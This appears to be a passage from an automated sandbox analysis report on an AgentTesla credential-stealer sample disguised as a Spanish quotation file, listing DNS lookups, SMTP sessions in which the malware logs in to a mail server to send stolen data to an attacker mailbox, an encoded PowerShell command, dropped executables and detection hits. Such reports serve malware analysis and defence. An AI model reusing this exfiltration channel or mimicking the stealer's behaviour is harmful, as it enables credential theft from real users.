                                      Mar 20, 2023 17:40:41.172533035 CET8.8.8.8192.168.2.70x4e83No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:41.172533035 CET8.8.8.8192.168.2.70x4e83No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:47.163551092 CET8.8.8.8192.168.2.70x57dbNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:47.163551092 CET8.8.8.8192.168.2.70x57dbNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:47.163551092 CET8.8.8.8192.168.2.70x57dbNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:47.163551092 CET8.8.8.8192.168.2.70x57dbNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:47.163551092 CET8.8.8.8192.168.2.70x57dbNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:47.330579996 CET8.8.8.8192.168.2.70x2bdeNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:47.330579996 CET8.8.8.8192.168.2.70x2bdeNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:47.330579996 CET8.8.8.8192.168.2.70x2bdeNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:47.330579996 CET8.8.8.8192.168.2.70x2bdeNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:47.330579996 CET8.8.8.8192.168.2.70x2bdeNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.308312893 CET8.8.8.8192.168.2.70x93c0No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.308312893 CET8.8.8.8192.168.2.70x93c0No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.308312893 CET8.8.8.8192.168.2.70x93c0No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.308312893 CET8.8.8.8192.168.2.70x93c0No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.308312893 CET8.8.8.8192.168.2.70x93c0No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.338602066 CET8.8.8.8192.168.2.70x7d9dNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.338602066 CET8.8.8.8192.168.2.70x7d9dNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.338602066 CET8.8.8.8192.168.2.70x7d9dNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.338602066 CET8.8.8.8192.168.2.70x7d9dNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:40:59.338602066 CET8.8.8.8192.168.2.70x7d9dNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.320503950 CET8.8.8.8192.168.2.70x1df5No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.320503950 CET8.8.8.8192.168.2.70x1df5No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.320503950 CET8.8.8.8192.168.2.70x1df5No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.320503950 CET8.8.8.8192.168.2.70x1df5No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.320503950 CET8.8.8.8192.168.2.70x1df5No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.347078085 CET8.8.8.8192.168.2.70x92dbNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.347078085 CET8.8.8.8192.168.2.70x92dbNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.347078085 CET8.8.8.8192.168.2.70x92dbNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.347078085 CET8.8.8.8192.168.2.70x92dbNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:05.347078085 CET8.8.8.8192.168.2.70x92dbNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                      Mar 20, 2023 17:41:32.944188118 CET8.8.8.8192.168.2.70x8ddaName error (3)168.98.4.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                      • api.ipify.org
                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Mar 20, 2023 17:40:08.110202074 CET58749702208.91.199.224192.168.2.7220 us2.outbound.mailhostbox.com ESMTP Postfix
                                      Mar 20, 2023 17:40:08.127775908 CET49702587192.168.2.7208.91.199.224EHLO 287400
                                      Mar 20, 2023 17:40:08.316483021 CET58749702208.91.199.224192.168.2.7250-us2.outbound.mailhostbox.com
                                      250-PIPELINING
                                      250-SIZE 41648128
                                      250-VRFY
                                      250-ETRN
                                      250-STARTTLS
                                      250-AUTH PLAIN LOGIN
                                      250-AUTH=PLAIN LOGIN
                                      250-ENHANCEDSTATUSCODES
                                      250-8BITMIME
                                      250-DSN
                                      250 CHUNKING
                                      Mar 20, 2023 17:40:08.327778101 CET49702587192.168.2.7208.91.199.224AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                      Mar 20, 2023 17:40:08.519423962 CET58749702208.91.199.224192.168.2.7334 UGFzc3dvcmQ6
                                      Mar 20, 2023 17:40:08.714994907 CET58749702208.91.199.224192.168.2.7235 2.7.0 Authentication successful
                                      Mar 20, 2023 17:40:08.715282917 CET49702587192.168.2.7208.91.199.224MAIL FROM:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:40:08.905705929 CET58749702208.91.199.224192.168.2.7250 2.1.0 Ok
                                      Mar 20, 2023 17:40:08.906233072 CET49702587192.168.2.7208.91.199.224RCPT TO:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:40:09.117255926 CET58749702208.91.199.224192.168.2.7550 5.4.6 <log@thanhphoung-vn.com>: Recipient address rejected: Email Sending Quota Exceeded
                                      Mar 20, 2023 17:40:10.203640938 CET58749703208.91.199.224192.168.2.7220 us2.outbound.mailhostbox.com ESMTP Postfix
                                      Mar 20, 2023 17:40:10.205693960 CET49703587192.168.2.7208.91.199.224EHLO 287400
                                      Mar 20, 2023 17:40:10.390954971 CET58749703208.91.199.224192.168.2.7250-us2.outbound.mailhostbox.com
                                      250-PIPELINING
                                      250-SIZE 41648128
                                      250-VRFY
                                      250-ETRN
                                      250-STARTTLS
                                      250-AUTH PLAIN LOGIN
                                      250-AUTH=PLAIN LOGIN
                                      250-ENHANCEDSTATUSCODES
                                      250-8BITMIME
                                      250-DSN
                                      250 CHUNKING
                                      Mar 20, 2023 17:40:10.391586065 CET49703587192.168.2.7208.91.199.224AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                      Mar 20, 2023 17:40:10.581511021 CET58749703208.91.199.224192.168.2.7334 UGFzc3dvcmQ6
                                      Mar 20, 2023 17:40:10.774342060 CET58749703208.91.199.224192.168.2.7235 2.7.0 Authentication successful
                                      Mar 20, 2023 17:40:10.774724960 CET49703587192.168.2.7208.91.199.224MAIL FROM:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:40:10.962038994 CET58749703208.91.199.224192.168.2.7250 2.1.0 Ok
                                      Mar 20, 2023 17:40:10.981431007 CET49703587192.168.2.7208.91.199.224RCPT TO:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:40:11.190886021 CET58749703208.91.199.224192.168.2.7550 5.4.6 <log@thanhphoung-vn.com>: Recipient address rejected: Email Sending Quota Exceeded
                                      Mar 20, 2023 17:40:44.529150009 CET58749706208.91.199.223192.168.2.7220 us2.outbound.mailhostbox.com ESMTP Postfix
                                      Mar 20, 2023 17:40:44.563363075 CET49706587192.168.2.7208.91.199.223EHLO 287400
                                      Mar 20, 2023 17:40:44.746429920 CET58749706208.91.199.223192.168.2.7250-us2.outbound.mailhostbox.com
                                      250-PIPELINING
                                      250-SIZE 41648128
                                      250-VRFY
                                      250-ETRN
                                      250-STARTTLS
                                      250-AUTH PLAIN LOGIN
                                      250-AUTH=PLAIN LOGIN
                                      250-ENHANCEDSTATUSCODES
                                      250-8BITMIME
                                      250-DSN
                                      250 CHUNKING
                                      Mar 20, 2023 17:40:44.785456896 CET49706587192.168.2.7208.91.199.223AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                      Mar 20, 2023 17:40:44.970654011 CET58749706208.91.199.223192.168.2.7334 UGFzc3dvcmQ6
                                      Mar 20, 2023 17:40:45.162275076 CET58749706208.91.199.223192.168.2.7235 2.7.0 Authentication successful
                                      Mar 20, 2023 17:40:45.162636995 CET49706587192.168.2.7208.91.199.223MAIL FROM:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:40:45.347222090 CET58749706208.91.199.223192.168.2.7250 2.1.0 Ok
                                      Mar 20, 2023 17:40:45.347444057 CET49706587192.168.2.7208.91.199.223RCPT TO:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:40:45.547780991 CET58749706208.91.199.223192.168.2.7550 5.4.6 <log@thanhphoung-vn.com>: Recipient address rejected: Email Sending Quota Exceeded
                                      Mar 20, 2023 17:40:48.765419960 CET58749707208.91.198.143192.168.2.7220 us2.outbound.mailhostbox.com ESMTP Postfix
                                      Mar 20, 2023 17:40:48.765614033 CET49707587192.168.2.7208.91.198.143EHLO 287400
                                      Mar 20, 2023 17:40:48.950766087 CET58749707208.91.198.143192.168.2.7250-us2.outbound.mailhostbox.com
                                      250-PIPELINING
                                      250-SIZE 41648128
                                      250-VRFY
                                      250-ETRN
                                      250-STARTTLS
                                      250-AUTH PLAIN LOGIN
                                      250-AUTH=PLAIN LOGIN
                                      250-ENHANCEDSTATUSCODES
                                      250-8BITMIME
                                      250-DSN
                                      250 CHUNKING
                                      Mar 20, 2023 17:40:48.950999975 CET49707587192.168.2.7208.91.198.143AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                      Mar 20, 2023 17:40:49.138637066 CET58749707208.91.198.143192.168.2.7334 UGFzc3dvcmQ6
                                      Mar 20, 2023 17:40:49.330913067 CET58749707208.91.198.143192.168.2.7235 2.7.0 Authentication successful
                                      Mar 20, 2023 17:40:49.331135035 CET49707587192.168.2.7208.91.198.143MAIL FROM:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:40:49.517596006 CET58749707208.91.198.143192.168.2.7250 2.1.0 Ok
                                      Mar 20, 2023 17:40:49.517939091 CET49707587192.168.2.7208.91.198.143RCPT TO:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:40:49.722243071 CET58749707208.91.198.143192.168.2.7550 5.4.6 <log@thanhphoung-vn.com>: Recipient address rejected: Email Sending Quota Exceeded
                                      Mar 20, 2023 17:41:00.143541098 CET58749708208.91.199.223192.168.2.7220 us2.outbound.mailhostbox.com ESMTP Postfix
                                      Mar 20, 2023 17:41:00.144095898 CET49708587192.168.2.7208.91.199.223EHLO 287400
                                      Mar 20, 2023 17:41:00.327303886 CET58749708208.91.199.223192.168.2.7250-us2.outbound.mailhostbox.com
                                      250-PIPELINING
                                      250-SIZE 41648128
                                      250-VRFY
                                      250-ETRN
                                      250-STARTTLS
                                      250-AUTH PLAIN LOGIN
                                      250-AUTH=PLAIN LOGIN
                                      250-ENHANCEDSTATUSCODES
                                      250-8BITMIME
                                      250-DSN
                                      250 CHUNKING
                                      Mar 20, 2023 17:41:00.327670097 CET49708587192.168.2.7208.91.199.223AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                      Mar 20, 2023 17:41:00.514956951 CET58749708208.91.199.223192.168.2.7334 UGFzc3dvcmQ6
                                      Mar 20, 2023 17:41:00.825172901 CET58749708208.91.199.223192.168.2.7235 2.7.0 Authentication successful
                                      Mar 20, 2023 17:41:00.828579903 CET49708587192.168.2.7208.91.199.223MAIL FROM:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:41:01.013257027 CET58749708208.91.199.223192.168.2.7250 2.1.0 Ok
                                      Mar 20, 2023 17:41:01.036798000 CET49708587192.168.2.7208.91.199.223RCPT TO:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:41:01.235893965 CET58749708208.91.199.223192.168.2.7550 5.4.6 <log@thanhphoung-vn.com>: Recipient address rejected: Email Sending Quota Exceeded
                                      Mar 20, 2023 17:41:06.873320103 CET58749709208.91.199.225192.168.2.7220 us2.outbound.mailhostbox.com ESMTP Postfix
                                      Mar 20, 2023 17:41:06.873586893 CET49709587192.168.2.7208.91.199.225EHLO 287400
                                      Mar 20, 2023 17:41:07.057415009 CET58749709208.91.199.225192.168.2.7250-us2.outbound.mailhostbox.com
                                      250-PIPELINING
                                      250-SIZE 41648128
                                      250-VRFY
                                      250-ETRN
                                      250-STARTTLS
                                      250-AUTH PLAIN LOGIN
                                      250-AUTH=PLAIN LOGIN
                                      250-ENHANCEDSTATUSCODES
                                      250-8BITMIME
                                      250-DSN
                                      250 CHUNKING
                                      Mar 20, 2023 17:41:07.057683945 CET49709587192.168.2.7208.91.199.225AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                      Mar 20, 2023 17:41:07.243846893 CET58749709208.91.199.225192.168.2.7334 UGFzc3dvcmQ6
                                      Mar 20, 2023 17:41:07.434341908 CET58749709208.91.199.225192.168.2.7235 2.7.0 Authentication successful
                                      Mar 20, 2023 17:41:07.434547901 CET49709587192.168.2.7208.91.199.225MAIL FROM:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:41:07.620075941 CET58749709208.91.199.225192.168.2.7250 2.1.0 Ok
                                      Mar 20, 2023 17:41:07.620294094 CET49709587192.168.2.7208.91.199.225RCPT TO:<log@thanhphoung-vn.com>
                                      Mar 20, 2023 17:41:07.820089102 CET58749709208.91.199.225192.168.2.7550 5.4.6 <log@thanhphoung-vn.com>: Recipient address rejected: Email Sending Quota Exceeded

                                      Click to jump to process

                                      Target ID:0
                                      Start time:17:39:08
                                      Start date:20/03/2023
                                      Path:C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
                                      Imagebase:0x1ec5e380000
                                      File size:2820096 bytes
                                      MD5 hash:38B3D465545A56EA977BA43DCDA97B16
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.398943660.000001EC78C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      Target ID:10
                                      Start time:17:39:38
                                      Start date:20/03/2023
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                                      Imagebase:0x7ff6f4710000
                                      File size:447488 bytes
                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      Target ID:11
                                      Start time:17:39:38
                                      Start date:20/03/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:12
                                      Start time:17:39:54
                                      Start date:20/03/2023
                                      Path:C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe"
                                      Imagebase:0xc80000
                                      File size:171520 bytes
                                      MD5 hash:B1DFD2B85A645040D8C89D0FCED4340A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.530884956.000000000316C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.530884956.000000000316C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 50%, ReversingLabs
                                      • Detection: 62%, Virustotal, Browse
                                      Reputation:low

                                      Target ID:13
                                      Start time:17:39:57
                                      Start date:20/03/2023
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                      Imagebase:0x26e20ba0000
                                      File size:40552 bytes
                                      MD5 hash:6EE3F830099ADD53C26DF5739B44D608
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:moderate

                                      Target ID:14
                                      Start time:17:40:06
                                      Start date:20/03/2023
                                      Path:C:\Users\user\AppData\Local\explorers.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\explorers.exe"
                                      Imagebase:0x1dc27a80000
                                      File size:2820096 bytes
                                      MD5 hash:38B3D465545A56EA977BA43DCDA97B16
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.551519357.000001DC422C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 26%, ReversingLabs
                                      • Detection: 25%, Virustotal, Browse
                                      Reputation:low

                                      Target ID:15
                                      Start time:17:40:15
                                      Start date:20/03/2023
                                      Path:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                                      Imagebase:0x6f0000
                                      File size:171520 bytes
                                      MD5 hash:B1DFD2B85A645040D8C89D0FCED4340A
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.530714621.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.530714621.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 50%, ReversingLabs
                                      • Detection: 62%, Virustotal, Browse
                                      Reputation:low

                                      Target ID:16
                                      Start time:17:40:24
                                      Start date:20/03/2023
                                      Path:C:\Users\user\AppData\Local\explorers.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\explorers.exe"
                                      Imagebase:0x27d1c4e0000
                                      File size:2820096 bytes
                                      MD5 hash:38B3D465545A56EA977BA43DCDA97B16
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000010.00000002.545281703.0000027D36BC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      Target ID:19
                                      Start time:17:40:34
                                      Start date:20/03/2023
                                      Path:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                                      Imagebase:0xca0000
                                      File size:171520 bytes
                                      MD5 hash:B1DFD2B85A645040D8C89D0FCED4340A
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.532200083.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.532200083.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      Target ID:20
                                      Start time:17:41:14
                                      Start date:20/03/2023
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                                      Imagebase:0x7ff6f4710000
                                      File size:447488 bytes
                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      No disassembly